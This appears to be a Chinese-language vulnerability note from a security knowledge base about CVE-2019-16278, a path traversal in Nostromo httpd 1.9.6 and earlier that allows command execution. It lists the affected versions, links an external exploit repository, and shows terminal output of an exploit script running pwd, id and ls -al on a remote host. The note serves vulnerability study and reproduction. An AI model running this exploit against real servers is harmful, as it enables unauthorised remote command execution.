menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 095-Nostromo httpd chevron_right 001-CVE-2019-16278 Nostromo httpd 命令执行.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-CVE-2019-16278 Nostromo httpd 命令执行.md
    869 B / 2021-07-17 00:01:30
        # CVE-2019-16278 Nostromo httpd 命令执行
    
    ### 一、漏洞简介
    
    Nostromo httpd 1.9.6及之前版本中的‘http_verify’函数存在路径遍历漏洞。该漏洞源于网络系统或产品未能正确地过滤资源或文件路径中的特殊元素。攻击者可利用该漏洞访问受限目录之外的位置。
    
    ### 二、影响范围
    
    Nostromo httpd 1.9.6及之前版本中
    
    ### 三、复现过程
    
    https://github.com/ianxtianxt/CVE-2019-16278/
    
    
    ```bash
    ➜  Downloads python nostromo.py 114.114.114.114 8080 pwd
    /bin
    ➜  Downloads python nostromo.py 114.114.114.114 8080 id
    uid=65534 gid=65534
    ➜  Downloads python nostromo.py 114.114.114.114 8080 "ls -al"
    drwxr-xr-x    2 0        0                0 Apr 12  2013 .
    drwxr-xr-x   16 0        0                0 Jan  1  1970 ..
    lrwxrwxrwx    1 0        0                7 Apr 12  2013 ash -> busybox
    ```
    
    links
    file_download